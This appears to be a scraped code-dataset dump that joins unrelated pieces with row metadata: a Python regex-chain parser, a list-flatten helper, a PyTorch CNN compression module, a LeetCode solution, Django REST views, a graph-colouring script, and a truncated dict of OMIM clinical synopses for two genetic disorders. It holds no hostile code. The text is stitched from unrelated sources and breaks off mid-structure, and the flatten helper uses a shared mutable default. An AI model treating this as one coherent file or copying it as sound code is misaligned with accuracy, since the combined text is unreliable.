* A list of one or more of the above denoting a group definition
"""
if not regex:
# Base case, an empty chain
yield []
return
# Take care of union'd expressions here, first
paren_level = 0
index = 0
while index < len(regex):
c = regex[index]
if c == "(":
paren_level += 1
elif c == ")":
paren_level -= 1
if c == "|" and paren_level == 0:
# Here's where a yield from statement added in python 3.3 would
# come in handy
# Left side
for chain in self._parse_regex_part(regex[:index]):
yield chain
# Right side
for chain in self._parse_regex_part(regex[index+1:]):
yield chain
return
index += 1
if paren_level != 0:
raise ValueError("Unbalanced parentheses! {0!r}".format(regex))
# From this point on, we don't have to worry about unioned (|)
# expressions. Just try and handle one thing.
c = regex[0]
end_index = 0
group = False
if c in self.alphabet:
chains = [[set(c)]]
elif c == ".":
chains = [[set(self.alphabet)]]
elif c == "[":
end_index = regex.find("]")
if regex[1] == "^":
chains = [[set(self.alphabet - set(regex[2:end_index]))]]
else:
chains = [[set(regex[1:end_index])]]
elif c == "(":
# XXX Assume no nested parens for now
end_index = regex.find(")")
chains = list(self._parse_regex_part(regex[1:end_index]))
group = True
elif c == "\\":
# A group reference
end_index = 1
matchindex = int(regex[1])-1
# instead of a set or a chain, emit a chain with one integer, which
# will be dereferenced later
chains = [[matchindex]]
else:
raise ValueError("Found char {0!r} not in the alphabet or recognized regex special char".format(c))
# At this point, the chains list is a list of chains (a chain is a list
# of sets) representing the possible matches of the regex up to
# end_index. This may be quantified, so take care of that
if len(regex) > end_index+1:
quantifier = regex[end_index+1]
if quantifier == "*":
# Kleene star. any combination of `chains` can appear zero or
# more times
for chain2 in self._parse_regex_part(regex[end_index+2:]):
for repeatnum in range(self.length+1):
# chains from above may have multiple chains, and if we
# are to repeat them we must take a cross product
# because the repeated values could be any of the
# possible chains.
for chain1 in (reduce(add, c, []) for c in product(chains, repeat=repeatnum)):
if len(chain1) + len(chain2) <= self.length: # it ain't getting any shorter
yield self._copy_chain(chain1) + self._copy_chain(chain2)
return
elif quantifier == "+":
# Same as above but repeatnum starts at 1
for chain2 in self._parse_regex_part(regex[end_index+2:]):
for repeatnum in range(1, self.length+1):
for chain1 in (reduce(add, c, []) for c in product(chains, repeat=repeatnum)):
if len(chain1) + len(chain2) <= self.length:
yield self._copy_chain(chain1) + self._copy_chain(chain2)
return
elif quantifier == "?":
for chain2 in self._parse_regex_part(regex[end_index+2:]):
for chain1 in chains:
yield self._copy_chain(chain2)
yield self._copy_chain(chain1) + self._copy_chain(chain2)
return
# If the character was not one of the above, fall off this if
# statement and continue below
# If the code gets here, the handled item was not quantified
# XXX Assumption: only unquantified parenthesized expressions can be
# groups
for chain2 in self._parse_regex_part(regex[end_index+1:]):
for chain1 in chains:
if group:
# the chains in the chains var are part of a group.
# enclose it in a list to marke it as a group. chains will
# be flattened and group references dereferenced later.
yield [self._copy_chain(chain1)] + self._copy_chain(chain2)
else:
yield self._copy_chain(chain1) + self._copy_chain(chain2)
@staticmethod
def _copy_chain(chain, repeat=1):
"""Takes a chain and returns a copy of it, repeated the given number of
times
"""
# You may think this method could just be replaced with python's
# copy.deepcopy, but deepcopy will keep references to identical
# objects, copying the object just once, and we want to copy
# everything. In other words, this method also has the hidden but
# necessary effect of decoupling some set references in some chains.
if not isinstance(chain, list):
raise ValueError("Given item is not a chain. Chains are lists")
chaincopy = []
for _ in range(repeat):
for item in chain:
chaincopy.append(deepcopy(item))
return chaincopy
def constrain_slot(self, index, charset):
"""constrain_slot takes a slot index and a set of characters
indicating that slot, from some exteral source of knowledge, is one of
the given elements. This object is then updated and its own slots are
adjusted to be consistent with that data.
"""
charset = frozenset(charset)
newchains = []
for chain in self.chains:
chain[index] &= charset
if chain[index]:
newchains.append(chain)
self.chains = newchains
def peek_slot(self, index):
"""peek_slot takes a slot index, and returns the set of characters that
this object currently thinks are possible to go in that slot, according
to the regex and the constraints placed upon it.
"""
candidates = set()
for chain in self.chains:
candidates |= chain[index]
return candidates
def match(self, matchstr):
"""Takes a string and returns True or False if it matches this regex,
including the constraints previously placed on it with constrain_slot()
"""
if len(matchstr) != self.length:
return False
# The string needs to match at least one of the chains. We implement
# this as a series of constraints, but since we mutate the object we
# need to make a copy
newregex = self.copy()
for i, c in enumerate(matchstr):
newregex.constrain_slot(i, set(c))
return bool(newregex.chains)
def copy(self):
"""Makes a copy of this regex object, including any constraints already
applied
"""
newobj = self.__class__("", self.length, self.alphabet)
# The rest of this method could be implemented with deepcopy() and
# still function correctly, but deepcopy() runs quite a bit slower. The
# code below must make some assumptions that deepcopy() doesn't. I'm
# guessing it's probably that every item in the sets are immutable
# strings.
newobj.chains = []
for chain in self.chains:
# Copy each set, but we need to make sure to keep aliased
# references intact.
newchain = []
# maps the id() of old sets to the new copy of that set, so we can
# re-use it when we encounter the original again.
ids = {}
for oldset in chain:
if id(oldset) in ids:
newchain.append(ids[id(oldset)])
else:
newset = set(oldset)
newchain.append(newset)
ids[id(oldset)] = newset
newobj.chains.append(newchain)
return newobj
def __str__(self):
"""Return normalized string representing this regex object.
"""
out = []
for chain in self.chains:
chainstr = io.StringIO()
for slot in chain:
if slot == self.alphabet:
chainstr.write(".")
elif len(slot) > 3 and len(self.alphabet - slot) == 1:
# Missing one element
missing = (self.alphabet - slot).pop()
alphabet = "".join(sorted(self.alphabet))
i = alphabet.index(missing)
if i == 0:
chainstr.write("[{0}-{1}]".format(alphabet[1],alphabet[-1]))
elif i == len(alphabet)-1:
chainstr.write("[{0}-{1}]".format(alphabet[0],alphabet[-2]))
else:
chainstr.write("[{0}-{1}{2}-{3}]".format(alphabet[0],alphabet[i],alphabet[i+1],alphabet[-1]))
elif len(slot) == 1:
chainstr.write("".join(slot))
else:
chainstr.write("[{0}]".format("".join(sorted(slot))))
out.append(chainstr.getvalue())
return "|\n".join(out)
| [
"brownan@gmail.com"
] | brownan@gmail.com |
cf233d2e018d0b784cf396399eca19c8690bcd3b | b22e56f486f3045aa2d1bca052fca555b240e3a6 | /recursive/my_flatten.py | 2d5d664c199c840fdde6140cd63a5d60c4928347 | [] | no_license | jdeastwood/python-flatten | d7576e47642ab0756a8e43058925ff173071683b | a22e4ba1e9417162dcc6c01054fe196c9e4b9c85 | refs/heads/master | 2016-09-03T01:11:47.830724 | 2013-07-07T17:35:09 | 2013-07-07T17:35:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | def my_flatten(list_of_lists, accumulator=[]):
for elem in list_of_lists:
t = type(elem)
if t is list or t is tuple:
my_flatten(elem, accumulator)
else:
accumulator.append(elem)
return accumulator
| [
"james@james-ThinkPad-T510.(none)"
] | james@james-ThinkPad-T510.(none) |
37eb09cc8939677e76d618fe0df7a6fed5a6fd42 | 1758d8b34f681f63e588e9896e2ca244bf605e57 | /src/models/model_imageNet.py | 8b359e8b74ca1107cbd75b7bb29e2545fb2676db | [
"Apache-2.0"
] | permissive | snudatalab/FALCON | 7098225eb4627c45744322f22b28b38c060810ae | d71fe1563d9baf2fc9e5f4b5dee4bedb8d55b643 | refs/heads/master | 2023-05-25T16:25:35.211886 | 2023-05-21T06:21:03 | 2023-05-21T06:21:03 | 205,502,133 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 12,822 | py | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License
.
FALCON: FAst and Lightweight CONvolution
Authors:
- Chun Quan (quanchun@snu.ac.kr)
- U Kang (ukang@snu.ac.kr)
- Data Mining Lab. at Seoul National University.
File: models/model_imageNet.py
- Contain source code for re-organize the structure of pre-trained model.
Version: 1.0
"""
import torch
import torch.nn as nn
from models.falcon import EHPdecompose
from utils.tucker import Tucker2DecomposedConv
from models.dsconv import DepthwiseSeparableConv
from models.mobileconvv2 import Block as Block_MobileConvV2
from models.shuffleunit import ShuffleUnit
from models.shuffleunitv2 import ShuffleUnitV2
from models.stconv_branch import StConv_branch
class VGGModel_imagenet(nn.Module):
"""
Discription: Re-organize the structure of a given vgg model.
"""
def __init__(self, model):
"""
Initialize a given model.
:param model: the given model
"""
super(VGGModel_imagenet, self).__init__()
self.features = model.features
self.classifier = model.classifier
def forward(self, x):
"""Run forward propagation"""
x1 = self.features(x)
x1 = x1.view(x1.size(0), -1)
x2 = self.classifier(x1)
return x2, x1
def falcon(self, init=True, rank=1, bn=False, relu=False):
"""
Replace standard convolution by FALCON
:param rank: rank of EHP
:param init: whether initialize FALCON with EHP decomposition tensors
:param bn: whether add batch normalization after FALCON
:param relu: whether add ReLU function after FALCON
"""
print('********** Compressing...... **********')
for i in range(len(self.features)):
if isinstance(self.features[i], nn.Conv2d):
print(self.features[i])
compress = EHPdecompose(self.features[i], rank, init, bn=bn, relu=relu)
self.features[i] = compress
if isinstance(self.features[i], nn.BatchNorm2d):
device = self.features[i].weight.device
self.features[i] = nn.BatchNorm2d(self.features[i].num_features).to(device)
def stconv_branch(self, alpha=1):
"""
Replace standard convolution by stconv_branch (vs shuffleunitv2)
:param alpha: width multiplier
"""
for i in range(len(self.features)):
if isinstance(self.features[i], nn.Conv2d):
# print(self.features[i])
shape = self.features[i].weight.shape
if shape[1] == 3:
self.features[i] = nn.Conv2d(3, int(self.features[i].out_channels * alpha), kernel_size=3, padding=1)
self.features[i+1] = nn.BatchNorm2d(self.features[i].out_channels)
else:
compress = StConv_branch(int(self.features[i].in_channels * alpha),
int(self.features[i].out_channels * alpha),
stride=self.features[i].stride[0])
self.features[i] = compress
layers = []
for i in range(len(self.features)):
if (isinstance(self.features[i], nn.BatchNorm2d) and isinstance(self.features[i - 1], StConv_branch)) \
or (isinstance(self.features[i], nn.ReLU) and isinstance(self.features[i - 2], StConv_branch)):
pass
else:
layers.append(self.features[i])
if alpha != 1:
layers.append(layers[-1])
layers[-2] = nn.Conv2d(int(self.classifier[0].in_features * alpha / 49),
int(self.classifier[0].in_features / 49),
kernel_size=1,
stride=1,
padding=0)
self.features = nn.Sequential(*layers)
def falcon_branch(self, init=True):
"""
Replace standard convolution in stconv_branch by falcon
:param init: whether initialize falcon
"""
for i in range(len(self.features.module)):
if isinstance(self.features.module[i], StConv_branch):
self.features.module[i].falcon(init=init)
class BasicBlock_StConvBranch(nn.Module):
"""
Description: BasicBlock of ResNet with StConvBranch
"""
def __init__(self, conv1, conv2, downsample=None):
"""
Initialize BasicBlock_ShuffleUnit
:param conv1: the first convolution layer in BasicBlock_StConvBranch
:param conv2: the second convolution layer in BasicBlock_StConvBranch
"""
super(BasicBlock_StConvBranch, self).__init__()
self.conv1 = conv1
self.conv2 = conv2
self.downsample = downsample
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
"""Run forward propagation"""
out = self.conv1(x)
out = self.conv2(out)
if self.downsample is not None:
identity = self.downsample(x)
else:
identity = x
out += identity
out = self.relu(out)
return out
class ResNetModel_imagenet(nn.Module):
"""
Discription: Re-organize the structure of a given resnet model.
"""
def __init__(self, model):
"""
Initialize a given model.
:param model: the given model
"""
super(ResNetModel_imagenet, self).__init__()
self.features = nn.Sequential(
nn.Sequential(
model.conv1,
model.bn1,
model.relu,
model.maxpool
),
model.layer1,
model.layer2,
model.layer3,
model.layer4,
model.avgpool
)
self.classifier = model.fc
def forward(self, x):
"""Run forward propagation"""
x1 = self.features(x)
x1 = x1.view(x1.size(0), -1)
x2 = self.classifier(x1)
return x2, x1
def falcon(self, rank=1, init=True, bn=False, relu=False):
"""
Replace standard convolution by FALCON
:param rank: rank of EHP
:param init: whether initialize FALCON with EHP decomposition tensors
:param bn: whether add batch normalization after FALCON
:param relu: whether add ReLU function after FALCON
"""
print('********** Compressing...... **********')
for i in range(1, 5):
for j in range(len(self.features[i])):
if isinstance(self.features[i][j].conv1, nn.Conv2d):
print(self.features[i][j].conv1)
compress = EHPdecompose(self.features[i][j].conv1, rank, init, bn=bn, relu=relu)
self.features[i][j].conv1 = compress
if isinstance(self.features[i][j].conv2, nn.Conv2d):
print(self.features[i][j].conv2)
compress = EHPdecompose(self.features[i][j].conv2, rank, init, bn=bn, relu=relu)
self.features[i][j].conv2 = compress
if isinstance(self.features[i][j].bn1, nn.BatchNorm2d):
device = self.features[i][j].bn1.weight.device
self.features[i][j].bn1 = nn.BatchNorm2d(self.features[i][j].bn1.num_features).to(device)
if isinstance(self.features[i][j].bn2, nn.BatchNorm2d):
device = self.features[i][j].bn2.weight.device
self.features[i][j].bn2 = nn.BatchNorm2d(self.features[i][j].bn2.num_features).to(device)
def stconv_branch(self, alpha=1):
"""
Replace standard convolution by StConvBranch
:param alpha: width multiplier
"""
self.features[0][0] = nn.Conv2d(3, int(self.features[0][0].out_channels * alpha),
kernel_size=self.features[0][0].kernel_size,
stride=self.features[0][0].stride,
padding=self.features[0][0].padding,
bias=False)
self.features[0][1] = nn.BatchNorm2d(self.features[0][0].out_channels)
for i in range(1, 5):
for j in range(len(self.features[i])):
if isinstance(self.features[i][j].conv1, nn.Conv2d):
compress = StConv_branch(int(self.features[i][j].conv1.in_channels * alpha),
int(self.features[i][j].conv1.out_channels * alpha),
stride=self.features[i][j].conv1.stride[0])
self.features[i][j].conv1 = compress
if isinstance(self.features[i][j].conv2, nn.Conv2d):
compress = StConv_branch(int(self.features[i][j].conv2.in_channels * alpha),
int(self.features[i][j].conv2.out_channels * alpha),
stride=self.features[i][j].conv2.stride[0])
self.features[i][j].conv2 = compress
layers = []
layers.append(self.features[0])
for i in range(1, 5):
for j in range(len(self.features[i])):
if self.features[i][j].downsample is not None:
self.features[i][j].downsample[0] = nn.Conv2d(int(self.features[i][j].downsample[0].in_channels * alpha),
int(self.features[i][j].downsample[0].out_channels * alpha),
kernel_size=self.features[i][j].downsample[0].kernel_size,
stride=self.features[i][j].downsample[0].stride,
padding=self.features[i][j].downsample[0].padding,
bias=self.features[i][j].downsample[0].bias)
self.features[i][j].downsample[1] = nn.BatchNorm2d(int(self.features[i][j].downsample[1].num_features * alpha))
layers.append(BasicBlock_StConvBranch(self.features[i][j].conv1, self.features[i][j].conv2, self.features[i][j].downsample))
layers.append(self.features[5])
self.features = nn.Sequential(*layers)
self.classifier = nn.Linear(int(self.classifier.in_features * alpha), 1000, bias=True)
def falcon_branch(self, init=True):
"""
Replace standard convolution in stconv_branch by falcon
:param init: whether initialize falcon
"""
for i in range(len(self.features)):
if isinstance(self.features[i], BasicBlock_StConvBranch):
if isinstance(self.features[i].conv1, StConv_branch):
self.features[i].conv1.falcon(init=init)
if isinstance(self.features[i].conv2, StConv_branch):
self.features[i].conv2.falcon(init=init)
# for i in range(len(self.features.module)):
# if isinstance(self.features.module[i], StConv_branch):
# self.features.module[i].falcon(init=init)
class VGGModel_imagenet_inf(nn.Module):
"""
Discription: Re-organize the structure of a given vgg model.
"""
def __init__(self, model):
"""
Initialize a given model.
:param model: the given model
"""
super(VGGModel_imagenet_inf, self).__init__()
self.features = model.features
def forward(self, x):
return self.features(x)
class ResNetModel_imagenet_inf(nn.Module):
"""
Discription: Re-organize the structure of a given resnet model.
"""
def __init__(self, model):
"""
Initialize a given model.
:param model: the given model
"""
super(ResNetModel_imagenet_inf, self).__init__()
self.features = nn.Sequential(*list(model.features.children())[:-1])
def forward(self, x):
"""Run forward propagation"""
return self.features(x)
| [
"hyundonglee@Hyuns-MacBook-Pro.local"
] | hyundonglee@Hyuns-MacBook-Pro.local |
0bfe22a225fc631fd9b82eb32331f6e0fd8df359 | 395ec9e51411736f27682c5c6dcb272167c75bf4 | /leetcode/daily challenges/2020-11/17-mirror-reflection.py | 658d86c3baa328226429d53af97bed677216c828 | [] | no_license | Nayald/algorithm-portfolio | 84242483273595912560128169fd67d1ef4a8871 | f6f7b548b29abe53b88a7396296d7edc932450cc | refs/heads/master | 2023-05-01T20:24:04.349022 | 2021-05-15T16:16:54 | 2021-05-15T16:16:54 | 298,006,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | class Solution:
def mirrorReflection(self, p: int, q: int) -> int:
h, r = q, 1
while h % p != 0:
h += q
r ^= 1
if r == 0:
return 2
elif (h // p) % 2 == 1:
return 1
else:
return 0
| [
"xavier.marchal.2@gmail.com"
] | xavier.marchal.2@gmail.com |
9f111dee20b77dd96f8990ce0d94617eada8184b | 471c6751dd08fefa0d647785ac2227b9c907f0ee | /company/views.py | 5b4262f8e4e988774cf746f490d378e4018ef38e | [] | no_license | kamlesh-kp/taskmanagement | e10634913682d3652cf63d4254a1cc072594ea75 | 12f8046cff73af33f4f3f1827eeeafa19b9a13f4 | refs/heads/master | 2022-05-01T15:09:16.854427 | 2019-09-23T16:17:10 | 2019-09-23T16:17:10 | 204,920,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,303 | py | from .models import Employee
from .serializers import EmployeeSerializer
from rest_framework import generics
from rest_framework import mixins
from rest_framework.permissions import IsAuthenticated
class EmployeeList(mixins.ListModelMixin,
mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
generics.GenericAPIView):
queryset = Employee.objects.all()
serializer_class = EmployeeSerializer
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class EmployeeDetail(
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
generics.GenericAPIView):
queryset = Employee.objects.all()
serializer_class = EmployeeSerializer
def get(self, request, *args, **kwargs):
print("GET", args, kwargs)
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
| [
"parmarkamleshk@gmail.copm"
] | parmarkamleshk@gmail.copm |
55e79bd191ffe9687b9c3a799bef14b5e3c01b61 | 999f3f3da1cb70cb5872f99a09d65d7c4df71cf7 | /src/data/290.py | fb2d7139623c1498c3f0b53f9cf6d659f8606b2a | [
"MIT"
] | permissive | NULLCT/LOMC | 0f0d1f01cce1d5633e239d411565ac7f0c687955 | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | refs/heads/main | 2023-07-27T17:03:46.703022 | 2021-09-04T08:58:45 | 2021-09-04T08:58:45 | 396,290,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | import queue
N, Q = map(int, input().split())
roads = [[] for _ in range(N)]
for i in range(N - 1):
a, b = map(int, input().split())
roads[a - 1].append(b - 1)
roads[b - 1].append(a - 1)
color = [-1] * N
color[0] = 0
que = queue.Queue()
que.put(0)
while not que.empty():
cur = que.get()
for next in roads[cur]:
if color[next] == -1:
color[next] = 0 if color[cur] else 1
que.put(next)
for i in range(Q):
c, d = map(int, input().split())
print("Town" if color[c - 1] == color[d - 1] else "Road")
| [
"cockatiel.u10@gmail.com"
] | cockatiel.u10@gmail.com |
3f5bc7b1ef00bee3974844969adabaab86ab5955 | c913c952cf4019d67f02bf1971917116da375c81 | /Data/OMIMresults/omimResults5140to5160.py | 5eaf8c690174d02ca388d68de1b0424629b3b304 | [] | no_license | jiangchb/OMIMscraping | 57afa5b2f8b7ca975e7459814e0410a872f71990 | 27d4ac8faea526b1c70937317caec064bed00a0a | refs/heads/master | 2022-03-14T21:35:56.102665 | 2019-11-22T15:48:48 | 2019-11-22T15:48:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 113,044 | py | omim = {'omim': {
'version': '1.0',
'searchResponse': {
'search': '*',
'expandedSearch': '*:*',
'parsedSearch': '+*:* ()',
'searchSuggestion': None,
'searchSpelling': None,
'filter': '',
'expandedFilter': None,
'fields': '',
'searchReport': None,
'totalResults': 7368,
'startIndex': 5140,
'endIndex': 5159,
'sort': '',
'operator': '',
'searchTime': 2.0,
'clinicalSynopsisList': [
{'clinicalSynopsis': {
'mimNumber': 617049,
'prefix': '#',
'preferredTitle': 'CHOLESTASIS, PROGRESSIVE FAMILIAL INTRAHEPATIC, 5; PFIC5',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthOther': 'Failure to thrive {SNOMEDCT:54840006,433476000,432788009} {ICD10CM:R62.51} {ICD9CM:783.41} {UMLS C2315100,C0015544,C3887638 HP:0001508} {HPO HP:0001508 C0231246,C2315100}',
'abdomenLiver': '''Liver failure {SNOMEDCT:59927004} {ICD10CM:K72.9} {UMLS C0085605,C1306571 HP:0001399} {HPO HP:0001399 C0085605};\nDuctal reaction seen on liver biopsy {UMLS C4314030};\nIntralobular cholestasis {UMLS C4314029};\nDiffuse giant cell transformation {UMLS C4314028};\nBallooning of hepatocytes {UMLS C3276178};\nFibrosis {SNOMEDCT:263756000,112674009} {UMLS C0016059,C4285457};\nCirrhosis {SNOMEDCT:19943007} {ICD10CM:K74.60} {UMLS C1623038,C0023890 HP:0001394} {HPO HP:0001394 C0023890};\nUndetectable BSEP expression in bile canaliculi {UMLS C4314027}''',
'skinNailsHairSkin': 'Jaundice {SNOMEDCT:18165001} {ICD10CM:R17} {UMLS C0022346,C2203646,C2010848 HP:0000952} {HPO HP:0000952 C0022346}',
'hematology': '''Vitamin K-independent coagulopathy {UMLS C4314025};\nIncreased INR {SNOMEDCT:313341008} {UMLS C0853225} {HPO HP:0008151 C0151872};\nProlonged prothrombin time {SNOMEDCT:409674002} {UMLS C0151872 HP:0008151} {HPO HP:0008151 C0151872};\nDecreased levels of factor V and VII {UMLS C4314024}''',
'prenatalManifestationsAmnioticFluid': 'Hydrops (1 patient) {UMLS C4314031} {HPO HP:0000969 C0013604}',
'laboratoryAbnormalities': '''Abnormal liver enzymes {SNOMEDCT:166643006} {UMLS C0438237 HP:0002910} {HPO HP:0002910 C0086565,C0151766,C0235996,C0438237,C0438717,C0877359,C1842003,C1848701};\nGGT is not increased {UMLS C4314026};\nIncreased alpha-fetoprotein {UMLS C0235971 HP:0006254};\nHypoglycemia {SNOMEDCT:271327008,302866003,237630007} {ICD10CM:E16.2} {ICD9CM:251.2} {UMLS C4553659,C0020615 HP:0001943} {HPO HP:0001943 C0020615};\nHyperammonemia {SNOMEDCT:9360008} {ICD10CM:E72.20} {UMLS C0220994 HP:0001987} {HPO HP:0001987 C0220994}''',
'miscellaneous': '''Onset at birth or in the neonatal period {UMLS C4314022};\nRapid progression {UMLS C1838681 HP:0003678} {HPO HP:0003678 C1838681,C1850776};\nFatal unless liver transplant is performed {UMLS C4314021};\nTwo unrelated families have been reported (last curated July 2016) {UMLS C4314881}''',
'molecularBasis': 'Caused by mutation in the nuclear receptor subfamily 1, group H, member 4 gene (NR1H4, {603826.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': True,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': True,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': True,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617050,
'prefix': '#',
'preferredTitle': 'HERMANSKY-PUDLAK SYNDROME 10; HPS10',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly {SNOMEDCT:1829003} {ICD10CM:Q02} {ICD9CM:742.1} {UMLS C4551563,C0025958 HP:0000252} {HPO HP:0000252 C0424688} {EOM ID:8ae2118220c1308f IMG:Microcephaly-small.jpg}',
'headAndNeckFace': '''Flat philtrum {UMLS C1142533 HP:0000319} {HPO HP:0000319 C1142533} {EOM ID:3abca500a8f1872a IMG:Philtrum,Smooth-small.jpg};\nRetrognathia {SNOMEDCT:109515000} {UMLS C0035353,C3494422 HP:0000278} {HPO HP:0000278 C3494422} {EOM ID:588f04d3f1b40b25 IMG:Retrognathia-small.jpg}''',
'headAndNeckEars': '''Low-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nLarge ears {SNOMEDCT:275480001} {UMLS C0554972 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838};\nDecreased brainstem-evoked auditory potentials {UMLS C4314019};\nReduced otoacoustic potentials {UMLS C4314018}''',
'headAndNeckEyes': '''Hypotelorism {SNOMEDCT:44593008} {UMLS C0424711 HP:0000601} {HPO HP:0000601 C0424711} {EOM ID:5bfbc4ab8a8af765 IMG:Eyes,Closely_Spaced-small.jpg};\nNystagmus {SNOMEDCT:563001} {ICD10CM:H55.0,H55.00} {ICD9CM:379.50} {UMLS C1963184,C4554036,C0028738 HP:0000639} {HPO HP:0000639 C0028738};\nOcular albinism {SNOMEDCT:26399002} {ICD10CM:E70.319,E70.31} {UMLS C0078917 HP:0001107} {HPO HP:0001107 C0078917};\nLack of ocular fixation {UMLS C4314017}''',
'respiratory': 'Recurrent respiratory infections {UMLS C3806482 HP:0002205} {HPO HP:0002205 C3806482}',
'respiratoryLung': 'Interstitial lung disease {SNOMEDCT:233703007} {ICD10CM:J84.9} {UMLS C0206062 HP:0006530} {HPO HP:0006530 C0206062}',
'abdomenLiver': 'Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': 'Feeding difficulties {SNOMEDCT:78164000} {ICD10CM:R63.3} {UMLS C0232466 HP:0011968} {HPO HP:0011968 C0232466}',
'skeletalPelvis': 'Flat acetabulae {UMLS C1865196}',
'skinNailsHairSkin': 'Cutaneous albinism {SNOMEDCT:718122005,6479008} {ICD10CM:E70.39} {UMLS C0080024 HP:0007544,HP:0007443}',
'skinNailsHairHair': 'Poorly pigmented hair {UMLS C3281294}',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Lack of developmental progress {UMLS C4314020};\nSeizures, refractory {UMLS C2676167};\nGeneralized tonic-clonic seizures {SNOMEDCT:54200006} {ICD10CM:G40.4} {UMLS C0494475 HP:0002069} {HPO HP:0002069 C0494475};\nMyoclonic seizures {SNOMEDCT:37356005} {UMLS C4317123,C0014550 HP:0002123} {HPO HP:0002123 C0014550,C0751778,C4021759};\nTruncal hypotonia {UMLS C1853743 HP:0008936} {HPO HP:0008936 C1853743};\nLittle spontaneous movement {UMLS C3280662};\nDystonia {SNOMEDCT:15802004} {ICD10CM:G24,G24.9} {UMLS C0393593,C0013421 HP:0001332} {HPO HP:0001332 C0013421,C4020871};\nAbnormal EEG {SNOMEDCT:274521009} {ICD10CM:R94.01} {UMLS C0151611 HP:0002353} {HPO HP:0002353 C0151611};\nFrontal lobe atrophy {UMLS C3279888};\nCerebral atrophy {SNOMEDCT:278849000} {UMLS C0235946 HP:0002059} {HPO HP:0002059 C0154671,C0235946,C4020860};\nDelayed myelination {SNOMEDCT:135810007} {UMLS C1277241 HP:0012448} {HPO HP:0012448 C1277241}''',
